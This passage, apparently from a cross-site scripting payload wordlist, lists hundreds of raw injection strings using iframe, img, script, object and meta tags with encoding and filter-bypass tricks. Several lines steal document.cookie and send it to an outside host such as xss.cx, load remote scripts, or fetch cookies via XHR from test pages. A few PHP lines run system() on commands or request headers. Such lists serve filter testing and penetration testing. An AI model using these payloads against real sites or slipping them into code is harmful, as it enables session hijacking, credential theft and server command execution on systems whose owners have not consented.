src=javascript:confirm(4)></iframe>\n<iframe/name=\"if(0){\\u0061lert(1)}else{\\u0061lert(1)}\"/onload=\"eval(name)\";>\n<iframe/name=\"if(0){\\u0061lert(1)}else{\\u0061lert(1)}\"/onload=\"eval(name)\";> \n\"><iframe/onreadystatechange=confirm(1)\n<iframe/onreadystatechange=confirm(1)\n<iframe/onreadystatechange=\\u0061\\u006C\\u0065\\u0072\\u0074('\\u0061') worksinIE>\n<iframe/onreadystatechange=\\u0061\\u006C\\u0065\\u0072\\u0074('\\u0061') worksinIE>\n\"><iframe/src \\/\\/onload = prompt(1)\n<iframe/src \\/\\/onload = prompt(1)\n<iframe/src=\"data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==\">\n<iframe/src=\"data:text/html,<svg &#111;&#110;load=confirm(1)>\">\n/*iframe/src*/<iframe/src=\"<iframe/src=@\"/onload=prompt(1) /*iframe/src*/>\n<iframe/src=j&Tab;av&Tab;as&Tab;cri&Tab;pt&Tab;:co&Tab;nfir&Tab;m&Tab;(&Tab;&Tab;1&Tab;)>\n<iframe/src='javascript:if(null==null){javascript:0?1:confirm(1);}'>\n<iframe/src='javascript:if(null==null){javascript:0?1:confirm(1);}'>\n<!--[if]><script>confirm(1)</script -->\n<img language=vbs src=<b onerror=confirm#1/1#>  \n\"><img src=\"/\" =_=\" title=\"onerror='prompt(1)'\">\n<img src=\"/\" =_=\" title=\"onerror='prompt(1)'\">\n<img src ?itworksonchrome?\\/onerror = confirm(1)\n<img src ?itworksonchrome?\\/onerror = confirm(1)???\nâ€œ><img src= onerror=confirm(1)>\n<img src=//\\ onload=confirm(1)>\n<img src=`%00`&NewLine; onerror=confirm(1)&NewLine;\n<img src=1 onerror=Function(\"aler\"+\"t(documen\"+\"t.domain)\")()>\n\"]<img src=1 onerror=confirm(1)>\n/#<img src=1 onerror=javascript:confirm(3)>\n<img src=a onerror=eval(String.fromCharCode(97,108,101,114,116,40,39,67,104,101,97,116,115,111,110,39,41))>\n<img src=http://www.google.fr/images/srpr/logo3w.png onload=confirm(this.ownerDocument.cookie) width=0 height= 0 /> #\n\"><img src=javascript:while([{}]);>\n<img src=javascript:while([{}]);>\n<img/ src//'onerror/''/=confirm(1)//'>\n<img src=test.jpg?value=\">Yes, we are still inside a tag!\">\n<img src=x on*chr*Error=\"javascript:log(*num*)\"/>\n<img src=x on*chr*Error=\"javascript:log(*num*)\"/>\n<img src=x onerror=URL='javascript:confirm(1)'>\n\"\\\"><img src=\\\"x\\\" onerror=\\\"confirm(0)\\\"/>\",\n><img src=\\\"x\\\" onerror=\\\"confirm(0)\\\"/>\n<img src=x onerror='confirm(domain+/ -- /+cookie)'>\">\n<img src=x onerror='confirm(domain+/ -- /+cookie)'>\">\n\"><img src=x onerror=confirm('x') />]\n\"><img src=x onerror=confirm(1); ...\n\"><img src=x onerror=prompt(1);>\n\"><img src=x onerror=prompt(document.location);>#\"><img src=x onerror=prompt(document.location);>\n\"><img src=x onerror=prompt(\"xss\");>#\"><img src=x onerror=prompt(\"xss\");>\n\"><img src=x onerror=window.open('https://www.google.com/');>\n\"<img src=x onerror=x.onerror=confirm(1);prompt(2);confirm(/XSS/.source);prompt(String.fromCharCode(88,83,83))>\"\n\"\\\"><img src=x onerror=x.onerror=confirm(1);prompt(2);confirm(/XSS/.source);prompt(String.fromCharCode(88,83,83))>\",\n<img src=x onerror=x.onerror=confirm(1);prompt(2);confirm(/XSS/.source);prompt(String.fromCharCode(88,83,83))>\n><img src=x onerror=x.onerror=confirm(1);prompt(2);confirm(/XSS/.source);prompt(String.fromCharCode(88,83,83))>\n\"<img src=x onerror=x.onerror=m='%22%3E%3Cimg%20src%3Dx%20onerror%3Dx.onerror%3Dprompt%28/xss/.source%29%3E';d=unescape(m);document.write(d);prompt(String.fromCharCode(88,83,83))>\"\n<img src=x onerror=x.onerror=m='%22%3E%3Cimg%20src%3Dx%20onerror%3Dx.onerror%3Dprompt%28/xss/.source%29%3E';d=unescape(m);document.write(d);prompt(String.fromCharCode(88,83,83))>\n\"/><img src=x onerror=x.onerror=prompt(0)>\n\"\\\"/><img src=x onerror=x.onerror=prompt(0)>\"\n\"/><img src=x onerror=x.onerror=prompt&lpar;/xss/.source&rpar;;confirm(0);confirm(1)>\n\"\\\"/><img src=x onerror=x.onerror=prompt&lpar;/xss/.source&rpar;;confirm(0);confirm(1)>\"\n<![<img src=x:x onerror=`confirm(2)//`]-->\n<img src=xx: onerror=confirm(document.location)>\n\"><img src=\"xx:x\" alt=\"``onerror=confirm(1)\"><script>document.body.innerHTML+=''</script>\n<img src=\"xx:x\" alt=\"``onerror=confirm(1)\"><script>document.body.innerHTML+=''</script>\n\"<img src=`xx:xx` onerror=confirm(/XSS/.source);confirm(1)>\"\n\"\\\"><img src=`xx:xx` onerror=confirm(/XSS/.source);confirm(1)>\",\n<img src=`xx:xx` onerror=confirm(/XSS/.source);confirm(1)>\n><img src=`xx:xx` onerror=confirm(/XSS/.source);confirm(1)>\n<img src=xx:xx onerror=window[['logChr*chr*']](*num*)>\n<img src=`xx:xx`onerror=confirm(1)>\n<img src=`xx:xx`onerror=confirm(1)>\n<img/&#09;&#10;&#11; src=`~` onerror=prompt(1)>\n>\"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;confirm(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)>\n\"<img/src=` onerror=confirm(1)>\"\n<img/src=` onerror=confirm(1)>\n\"><--`<img/src=` onerror=confirm(1)> --!>\n<--`<img/src=` onerror=confirm(1)> --!>\n<img/src=%00 id=confirm(1) onerror=eval(id)\n<img/src=`%00` /id=confirm(1) /onerror=eval(id)\n<img/src=`%00` onerror=this.onerror=confirm(1) \n<img/src=@&#32;&#13; onerror = prompt('&#49;')\n<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1)\n<img/src=x alt=confirm(1) onmouseover=eval(alt)>\n<img/src=x alt=confirm(1) onmouseover=eval(alt)>\n\"\\\"><imgsrc=x onerror=confirm.onerror=confirm(1)>\",\n><imgsrc=x onerror=confirm.onerror=confirm(1)>\n<img/src=\"x\"/id=\"javascript\"/name=\":confirm\"/alt=\"(1)\"/onerror=\"eval(id + name + alt)\">\n=â€™â€><img/src=â€xâ€onerror=eval(String.fromCharCode(119,105,110,100,111,119,46,108,111,99,97,108,83,116,111,114,97,103,101,46,115,101,116,73,116,101,109,40,39,105,100,39,44,39,34,62,60,105,109,103,47,115,114,99,61,92,34,120,92,34,111,110,101,114,114,111,114,61,97,108,101,114,116,40,49,41,62,39,41))>\n'><img/src=\"x:x\"/onerror=\"confirm(1)\"'><\ninnerHTML=document.title\ninnerHTML=innerText\n<input autofocus onfocus=confirm(1)>\n<input formaction=JaVaScript:confirm(document.cookie)>\n<input id=x><input id=x><script>confirm(x)</script>\n<><input onfocus=confirm(0) autofocus <!--\n<input pattern=^((a+.)a)+$ value=aaaaaaaaaaaaaaa!>\n<input type=hidden onformchange=confirm(1)/>\n<input type=hidden style=`x:expression(confirm(1))`>\n<input type=hidden style=`x:expression(confirm(4))`>\n<input type=\"text\" name=\"a\"\n<input type=\"text\" value=`` <div/onmouseover='confirm(1)'>X</div>\n<input type=\"text\" value=``<div/onmouseover='confirm(1)'>X</div>\n\"><input value=<><iframe/src=javascript:confirm(1)\n<input value=<><iframe/src=javascript:confirm(1)\ninput1=<script/&in%u2119ut1=>al%u0117rt('1')</script>\n<input/onmouseover=\"javaSCRIPT&colon;confirm&lpar;1&rpar;\"\n<i/onclick=URL=name>\n\"/><isindex action=\"javas&Tab;cript:confirm(1)\" type=image>\n\"><isindex action=\"javas&Tab;cript:confirm(1)\" type=image>\n<isindex action=\"javas&Tab;cript:confirm(1)\" type=image> \n<isindex action=\"javas&Tab;cript:confirm(document.cookie)\" type=image>\n<isindex formaction=javascript:confirm(1)>\n<label class=\"<% confirm(1) %>\">\n<li style=\"color:rgb(''0,0,&#0;javascript:expression(confirm(1))\">XSS</li>\n<link rel=\"import\" href=\"//xss.cx\">\n<link rel=import onerror=confirm(1)>\n<link rel=\"prefetch\" href=\"http://xss.cx\">\n<link rel=stylesheet href='data:,+/v8*%7bx:e+AHgAcA-ression(confirm(1))%7D' >\n<link%20rel=\"import\"%20href=\"?bypass=<script>confirm(document.domain)</script>\">\n<listing>&ltimg src=x onerror=confirm(1)&gt</listing>\n&lt\n&lt;\n&lt;a href=\"http://i.imgur.com/b7sajuK.jpg\" download&gt;<a href=\"http://i.imgur.com/b7sajuK.jpg\" download>What a cute kitty!</a>&lt;/a&gt;\n&lt;img src=xx:x onerror=confirm(1)&gt;<script>document.body.innerHTML=document.body.innerText||document.body.textContent</script>\n&lt;label class=\"&lt;% confirm(1) %&gt;\"&gt;\n&lt;/script&gt;&lt;script&gt;confirm(1)&lt;/script&gt;\n<marquee onstart='javascript:confirm&#x28;1&#x29;'>^__^\n\"><marquee>confirm( `bypass :)`)</marquee>\n\"<marquee/onstart=confirm(/XSS/.source);confirm(1)>\"\n\"\\\"><marquee/onstart=confirm(/XSS/.source);confirm(1)>\",\n<marquee/onstart=confirm(/XSS/.source);confirm(1)>\n><marquee/onstart=confirm(/XSS/.source);confirm(1)>\n<math><a xlink:href=\"//jsfiddle.net/t846h/\">click\n<math><a/xlink:href=javascript&colon;confirm&lpar;1&rpar;>click\n<math><a/xlink:href=javascript:eval('\\141\\154\\145\\162\\164\\50\\61\\51')>X\n<meta charset=\"x-mac-farsi\">Ã‚Â¼script Ã‚Â¾confirm(1)//Ã‚Â¼/script Ã‚Â¾\n<meta content=\"&NewLine; 1 &NewLine;; JAVASCRIPT&colon; confirm(1)\" http-equiv=\"refresh\"/>\n<meta http-equiv=refresh content=\"0 javascript:confirm(1)\">\n\"><meta http-equiv=\"refresh\" content=\"0;javascript&colon;confirm(1)\"/>\n<meta http-equiv=\"refresh\" content=\"0;javascript&colon;confirm(1)\"/>\n<meta http-equiv=\"refresh\" content=\"0;javascript&colon;confirm(1)\"/>?\n<meta http-equiv=\"refresh\" content=\"0;url=javascript:confirm(1)\">\n<meta http-equiv=refresh content=+.1,javascript:confirm(document.cookie)>\n?movieName=\";]);}catch(e){}if(!self.a)self.a=!confirm(document.domain);//\n<object data=%22data:text/html;base64,PHNjcmlwdD4gdmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOyB4aHIub3BlbignR0VUJywgJ2h0dHA6Ly94c3NtZS5odG1sNXNlYy5vcmcveHNzbWUyJywgdHJ1ZSk7IHhoci5vbmxvYWQgPSBmdW5jdGlvbigpIHsgYWxlcnQoeGhyLnJlc3BvbnNlVGV4dC5tYXRjaCgvY29va2llID0gJyguKj8pJy8pWzFdKSB9OyB4aHIuc2VuZCgpOyA8L3NjcmlwdD4=%22>\n<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>\n<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>?\n\"\\\"\\/><object data='data:text/html;base64,PHNjcmlwdD5hbGVydCgieHNzIik8L3NjcmlwdD4='></object>\"\n><object data='data:text/html;base64,PHNjcmlwdD5hbGVydCgieHNzIik8L3NjcmlwdD4='></object>\"\n<object data='data:text/xml,<script xmlns=\"http://www.w3.org/1999/xhtml \">confirm(1)</script>>'>\n\"><object data=\"http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf\">\n<object data=\"http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf\">?\n\"/><object data=javascript&colon;\\u0061&#x6C;&#101%72t(1)>\n<object data=javascript&colon;\\u0061&#x6C;&#101%72t(1)>\n\"/><object type='text/x-html' data='javascript:prompt(/xss/.source);var x = prompt;x(0);x(/XSS/.source);x'></object>\n\"<object type='text/x-html' data='javascript:prompt(/xss/.source);var x = prompt;x(0);x(/XSS/.source);x'></object>\"\n\"><object type='text/x-html' data='javascript:prompt(/xss/.source);var x = prompt;x(0);x(/XSS/.source);x'></object>\",\n<object type='text/x-html' data='javascript:prompt(/xss/.source);var x = prompt;x(0);x(/XSS/.source);x'></object>\n\"/><object type=\"text/x-scriptlet\" data=\"http://jsfiddle.net/XLE63/ \"></object>\n<object type=\"text/x-scriptlet\" data=\"http://jsfiddle.net/XLE63/ \"></object>\n/*-->]]>%>?></object></script></title></textarea></noscript></style></xmp>'-/\"///><img id=\"b1\" src=1 onerror='$.getScript(\"http://xss.cx.js\", function() { c(); });'>'\n\"<option>'><button><img src=x onerror=confirm(0);></button></option>\"\n<option>'><button><img src=x onerror=confirm(0);></button></option>\n\"\\\"\\/><option>'><button><img src=x onerror=confirm(1);></button></option>\",\n><option>'><button><img src=x onerror=confirm(1);></button></option>\n<p hidden?={{hidden}}>123</p> \n<p style=\"font-family:'foo&amp;#x5c;27&amp;#x5c;3bx:expr&amp;#x65;ession(confirm(1))'\">\n?param1=<script>prompt(9);/*&param2=*/</script>\n$.parseHTML('<img src=xx:X onerror=confirm(1)>')\n<?php echo $_SERVER['PHP_SELF']?>\n</plaintext\\></|\\><plaintext/onmouseover=prompt(1)\n?playerID=a\\\";))}catch(e){confirm(document.domain)}//\n${@print(system($_SERVER['HTTP_USER_AGENT']))}\n${@print(system(â€œwhoamiâ€))}\n<q/oncut=confirm()\n'/><q/oncut=open()>//\n<q/oncut=open()>\n>&quot;&gt;&lt;script&gt;confirm(&#039;hi&#039;)&lt;/script&gt;&quot;&lt;</a>value=\"\"><script>confirm('hi')</script>\"<\"/>\n.replace(/.+/,eval)//\n<s \"'\"=\"\" 000=\"\">\n\"'\"><s/000 \"'\"><s/000\n\"'\"><s/000 \"'\"><s/000 \n<s%00c%00r%00%00ip%00t>confirm(0);</s%00c%00r%00%00ip%00t>\n<s[NULL]cript>confirm(1)</s[NULL]cript>'>Clickme</a>\n<sVg><scRipt %00>confirm&lpar;1&rpar;\n<<scr\\0ipt/src=http://xss.cx/xss.js></script\n<scri%00ipt>confirm(0);</script>\n<scri%00pt>confirm(1);</scri%00pt>\n\"<scri%00pt>confirm(0);</scri%00pt>\"\n\"\\\"><scri%00pt>confirm(0);</scri%00pt>\",\n<scri%00pt>confirm(0);</scri%00pt>\n><scri%00pt>confirm(0);</scri%00pt>\n<script>/*     */confirm(1)/*     */</script>\n<script>     function b() { return Safe.get(); } confirm(b({type:String.fromCharCode(99,108,105,99,107),isTrusted:true})); </script> \n<script>  function foo(elem, doc, text) {   elem.onclick = function (e) {    e.__defineGetter__(text[0], function () { return true })    confirm(Safe.get());   };      var event = doc.createEvent(text[1]);   event.initEvent(text[2], true, true);   elem.dispatchEvent(event);  } </script> <img src=http://www.google.fr/images/srpr/logo3w.png onload=foo(this,this.ownerDocument,this.name.split(/,/)) name=isTrusted,MouseEvent,click width=0 height=0 /> # \n<script>  (function (o) {   function exploit(x) {    if (x !== null)     confirm('User cookie is ' %2B x);    else     console.log('fail');   }      o.onclick = function (e) {    e.__defineGetter__('isTrusted', function () { return true; });    exploit(Safe.get());   };      var e = document.createEvent('MouseEvent');   e.initEvent('click', true, true);   o.dispatchEvent(e);  })(document.getElementById('safe123')); </script>\n<script /*%00*/>/*%00*/confirm(1)/*%00*/</script /*%00*/\n<script ~~~>confirm(0%0)</script ~~~>\n<script ^__^>confirm(String.fromCharCode(49))</script ^__^\n'\"`><script>/* **chr*log(*num*)// */</script>\n<script>/* **chr*/log(*num*)// */</script>\n<script /***/>/***/confirm('\\uFF41\\uFF4C\\uFF45\\uFF52\\uFF54\\u1455\\uFF11\\u1450')/***/</script /***/\n<script> document.getElementById(%22safe123%22).click=function()+{confirm(Safe.get());} document.getElementById(%22safe123%22).click({'type':'click','isTrusted':true}); </script>\n<script> document.getElementById(%22safe123%22).setCapture(); document.getElementById(%22safe123%22).click(); </script>\n<script for=_ event=onerror()>confirm(/@ma1/)</script><img id=_ src=>\n<script for=document event=onreadystatechange>getElementById('safe123').click()</script>\n<script itworksinallbrowsers>/*<script* */confirm(1)</script\n<script itworksinallbrowsers>/*<script* */confirm(1)</script ?\n<script> location.href = 'data:text/html;base64,PHNjcmlwdD54PW5ldyBYTUxIdHRwUmVxdWVzdCgpO3gub3BlbigiR0VUIiwiaHR0cDovL3hzc21lLmh0bWw1c2VjLm9yZy94c3NtZTIvIix0cnVlKTt4Lm9ubG9hZD1mdW5jdGlvbigpIHsgYWxlcnQoeC5yZXNwb25zZVRleHQubWF0Y2goL2RvY3VtZW50LmNvb2tpZSA9ICcoLio/KScvKVsxXSl9O3guc2VuZChudWxsKTs8L3NjcmlwdD4='; </script>\n<script> logChr0x09(1); </script>\n<script src=>confirm(8)</script>\n\"/><script src=\"data:text/javascript,confirm(1)\"></script>\n<script src=\"data:text/javascript,confirm(1)\"></script>\n\"<script src='data:text/javascript,prompt(/XSS/.source);var x = prompt;x(0);x(/XSS/.source);x'></script>\"\n\"\\\"><script src='data:text/javascript,prompt(/XSS/.source);var x = prompt;x(0);x(/XSS/.source);x'></script>\",\n<script src='data:text/javascript,prompt(/XSS/.source);var x = prompt;x(0);x(/XSS/.source);x'></script>\n><script src='data:text/javascript,prompt(/XSS/.source);var x = prompt;x(0);x(/XSS/.source);x'></script>\n<script type=\"text/xaml\"><Canvas Loaded=\"confirm\" /></script>\n<script> \"\\ud83d\\u*hex4*\".match(/.*<.*/) ? log(*num*) : null; </script>\n<script> var xdr = new ActiveXObject(%22Microsoft.XMLHTTP%22);  xdr.open(%22get%22, %22/xssme2%3Fa=1%22, true); xdr.onreadystatechange = function() { try{   var c;   if (c=xdr.responseText.match(/document.cookie = '(.*%3F)'/) )    confirm(c[1]); }catch(e){} };  xdr.send(); </script>\n<script> var+MouseEvent=function+MouseEvent(){}; MouseEvent=MouseEvent var+test=new+MouseEvent(); test.isTrusted=true; test.type='click';  document.getElementById(%22safe123%22).click=function()+{confirm(Safe.get());} document.getElementById(%22safe123%22).click(test); </script>\n\"/><script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); confirm(RegExp.%241); } } xmlHttp.send(null); }; </script>#\n<script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); confirm(RegExp.%241); } } xmlHttp.send(null); }; </script>\n<script> var+x+=+showModelessDialog+(this); confirm(x.document.cookie); </script>\n\"/><script x> confirm(1) </script 1=2\n<script x> confirm(1) </script 1=2\n<script/%00%00v%00%00>confirm(/@jackmasa/)</script> and %c0â€³//(%000000%0dconfirm(1)//\n<script>({0:#0=confirm/#0#/#0#(0)})</script>\n<script>(0)['constructor']['constructor'](\"\\141\\154\\145\\162\\164(1)\")();</script>\n\"<script>1-confirm(0);</script>\"/>\n\"/><script>+-+-1-+-+confirm(1)</script>\n<script>+-+-1-+-+confirm(1)</script>\n<script>Object.defineProperties(window, {Safe: {value: {get: function() {return document.cookie}}}});confirm(Safe.get())</script>\n<script>Object.defineProperty(window, 'Safe', {value:{}});Object.defineProperty(Safe, 'get', {value:function() {return document.cookie}});confirm(Safe.get())</script>\n<script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script>\n<script>a='abc\\*chr*\\';log(*num*)//def';</script>\n\"<script>'confirm(0)%3B<%2Fscript>\"\n\"\\\"><script>'confirm(0)%3B<%2Fscript>\",\n<script>'confirm(0)%3B<%2Fscript>\n><script>'confirm(0)%3B<%2Fscript>\n\"<script>confirm(0);</script>\"\n\"><\"script\">\"confirm(0)\"</\"script\">\n\"\\\"><script>confirm(0)</script>\",\n<script>confirm(0);</script>\n><script>confirm(0)</script>\n\"'><script>confirm(1)</script>\",\n<sc'+'ript>confirm(1)</script>\n<script>confirm(1)</script>\n>\"<>\"<script>confirm(1)</script>\n[<script>]=*confirm(1)</script>\nâˆ€ã¸€ã°€scriptã¸€confirm(1)ã°€/scriptã¸€\n<%<!--'%><script>confirm(1);</script -->\n<%<!--'%><script>confirm(1);</script -->\n\"/><script>confirm(1);</script><img src=x onerror=x.onerror=prompt(0)>\n\"\\\"/><script>confirm(1);</script><img src=x onerror=x.onerror=prompt(0)>\"\n>\"<>\"<script>confirm(2)</script>\n<script>confirm(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(this,'window')(),'document')(), 'getElementsByTagName')('html')[0],'innerHTML')().match(/d.*'/));</script>\n\"<script>confirm(String.fromCharCode(88,83,83));</script>\"\n\"\\\"><script>confirm(String.fromCharCode(88,83,83));</script>\",\n<script>confirm(String.fromCharCode(88,83,83));</script>\n><script>confirm(String.fromCharCode(88,83,83));</script>\n<script>/*confirm(\"Woops\");*/</script>\n<script>confirm(document.documentElement.innerHTML.match(/'([^']%2b)/)[1])</script>\n<script>confirm(document.getElementsByTagName('html')[0].innerHTML.match(/'([^']%2b)/)[1])</script>\n<script>confirm(document.head.childNodes[3].text)</script>\n<script>confirm(document.head.innerHTML.substr(146,20));</script>\n>\"><script>confirm(document.location)</script>&\n<script>confirm(\"&quot;no\")</script>\n<script>confirm(x.y[0])</script>\n<script>confirm(x.y.x.y.x.y[0]);confirm(x.x.x.x.x.x.x.x.x.y.x.y.x.y[0]);</script>\n\"'`><script>a=/xss;*chr*;i=0;log(*num*);a/i;</script>\n\"`'><script>*chr*log(*num*)</script>\n<script>document.body.innerHTML=\"<h1>XSS-Here</h1>\"</script>\n<script>document.write(Array(184).join('<marquee>'))</script>\n\"/><script>document.write(\"<img src=//xss.cx/\" + document.cookie + \">\")</script>\n<script>document.write(\"<img src=//xss.cx/\" + document.cookie + \">\")</script>\n<script>(function() {var event = document.createEvent(%22MouseEvents%22);event.initMouseEvent(%22click%22, true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);var fakeData = [event, {isTrusted: true}, event];arguments.__defineGetter__('0', function() { return fakeData.pop(); });confirm(Safe.get.apply(null, arguments));})();</script>\n<script>function x(window) { eval(location.hash.substr(1)) }; open(%22javascript:opener.x(window)%22)</script>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { confirm(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();\n<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe id=iframe src=%22javascript:parent.x(window)%22><iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { confirm(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();\n<script>if(\"x\\*chr*\".length==1) { log(*num*);}</script>\n</script><img/*%00/src=\"worksinchrome&colon;prompt&#x28;1&#x29;\"/%00*/onerror='eval(src)'>\n\"`'><script>lo*chr*g(*num*)</script>\n\"`'><script>lo*chr*g(*num*)</script>\n\"'`><script>log*chr*(*num*)</script>\n<script/onload=confirm(1)></script>\n\\\"><script>prompt(1)</script>\n</script><script>confirm(3)</script>\n</script><script>/*var a=\"/*\"\"'/**/;confirm(1);//</script>\n<script>({set/**/$($){_/**/setter=$,_=1}}).$=confirm</script>\n<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>\n<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script> ?\n\"/><script+src=data:,confirm(1)<!-- \n<script+src=data:,confirm(1)<!-- \n\"/><script/src=\"data&colon;text%2Fj\\u0061v\\u0061script,\\u0061lert('\\u0061')\"></script a=\\u0061 & /=%2F\n<script/src=\"data&colon;text%2Fj\\u0061v\\u0061script,\\u0061lert('\\u0061')\"></script a=\\u0061 & /=%2F\n<script/src=data&colon;text/j\\u0061v\\u0061&#115&#99&#114&#105&#112&#116,\\u0061%6C%65%72%74(/XSS/)></script\n<script/src=data&colon;text/j\\u0061v\\u0061&#115&#99&#114&#105&#112&#116,\\u0061%6C%65%72%74(/XSS/)></script ????????????\n<script/src=//xss.cx>/*\n<script>str='';for(i=0;i<0xefff;i++){str+='<script>AAAAAA';};document.write('<svg>'+str+'</svg>');</script>\n</script><svg '//\"\n</script><svg onload='-/\"/-confirm(1)//'\n</script><svg onload='-/\"/-confirm(1)//'\"\n<script>try{eval(\"<></>\");logBoolean(1)}catch(e){logBoolean(0)};</script>\n<script>~'\\u0061' ;  \\u0074\\u0068\\u0072\\u006F\\u0077 ~ \\u0074\\u0068\\u0069\\u0073.  \\u0061\\u006C\\u0065\\u0072\\u0074(~'\\u0061')</script U+\n<script>~'\\u0061' ; \\u0074\\u0068\\u0072\\u006F\\u0077 ~ \\u0074\\u0068\\u0069\\u0073. \\u0061\\u006C\\u0065\\u0072\\u0074(~'\\u0061')</script U+\n<script/v>confirm(/@jackmasa/)</script>\n<script>-{valueOf:location,toString:[].pop,0:'vbscript:confirm%281%29',length:1}</script> \n<script>var location={};</script>\n<script>var request = new XMLHttpRequest();request.open('GET', 'http://html5sec.org/xssme2', false);request.send(null);if (request.status == 200){confirm(request.responseText.substr(150,41));}</script>\n<script>var script = document.getElementsByTagName('script')[0]; var clone = script.childNodes[0].cloneNode(true); var ta = document.createElement('textarea'); ta.appendChild(clone); confirm(ta.value.match(/cookie = '(.*?)'/)[1])</script>\n<script>var x = document.createElement('iframe');document.body.appendChild(x);var xhr = x.contentWindow.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { confirm(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();</script>\n<script>var x = safe123.onclick;safe123.onclick = function(event) {var f = false;var o = { isTrusted: true };var a = [event, o, event];var get;event.__defineGetter__('type', function() {get = arguments.callee.caller.arguments.callee;return 'click';});var _confirm = confirm;confirm = function() { confirm = _confirm };x.apply(null, a);(function() {arguments.__defineGetter__('0', function() { return a.pop(); });confirm(get());})();};safe123.click();</script>#\n`'\"><script>window['log*chr*'](*num*)</script>\n'<script>window.onload=function(){document.forms[0].message.value='1';}</script>\n<script>x=\"confirm(1)\".replace(/.+/,eval)//\"</script>\n<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>Object.defineProperty(parent,'Safe',{value:{}});Object.defineProperty(parent.Safe,'get',{value:function(){return top.document.cookie}});confirm(parent.Safe.get())<\\/script>%22)};document.body.appendChild(x);</script>\n<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){confirm(r.responseText.substr(150,41));}<\\/script>%22)};document.body.appendChild(x);</script>\n<script>xhr=new ActiveXObject(%22Msxml2.XMLHTTP%22);xhr.open(%22GET%22,%22/xssme2%22,true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){confirm(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();</script>\n<script>x=\"\"!=prompt(9)!=\"\";y=42;</script>\n<script>x=\"\"%prompt(9)%\"\";y=42;</script>\n<script>x=\"\"&&prompt(9)&&\"\";y=42;</script>\n<script>x=\"\"&prompt(9)&\"\";y=42;</script>\n<script>x=\"\"*prompt(9)*\"\";y=42;</script>\n<script>x=\"\"+prompt(9)+\"\";y=42;</script>\n<script>x=\"\"-prompt(9)-\"\";y=42;</script>\n<script>x=\"\"/prompt(9)/\"\";y=42;</script>\n<script>x=\"\"<<prompt(9)<<\"\";y=42;</script>\n<script>x=\"\"<=prompt(9)<=\"\";y=42;</script>\n<script>x=\"\"<prompt(9)<\"\";y=42;</script>\n<script>x=\"\"===prompt(9)===\"\";y=42;</script>\n<script>x=\"\"==prompt(9)==\"\";y=42;</script>\n<script>x=\"\">=prompt(9)>=\"\";y=42;</script>\n<script>x=\"\">>>prompt(9)>>>\"\";y=42;</script>\n<script>x=\"\">>prompt(9)>>\"\";y=42;</script>\n<script>x=\"\">prompt(9)>\"\";y=42;</script>\n<script>x=\"\"?prompt(9):\"\";y=42;</script>\n<script>x=\"\"^prompt(9)^\"\";y=42;</script>\n<script>x=\"\"|prompt(9)|\"\";y=42;</script>\n<script>x=\"\"||prompt(9)||\"\";y=42;</script>\n\"><scri<script></script>pt>confirm(document.cookie);</scri<script></script>pt>\n<scri\\x00pt>confirm(1);</scri%00pt>\nsetTimeout(['confirm(4)']);\n<span id=\"x\" data-constructor=oops></span><script>confirm(x.dataset.constructor)</script>\nstop, open, print && confirm(1)\n</style &#32;><script &#32; :-(>/**/confirm(document.location)/**/</script &#32; :-(\n<style>body{font-size: 0;} h1{font-size: 12px !important;}</style><h1><?php echo \"<hr />THIS IMAGE COULD ERASE YOUR WWW ACCOUNT, it shows you the PHP info instead...<hr />\"; phpinfo(); __halt_compiler(); 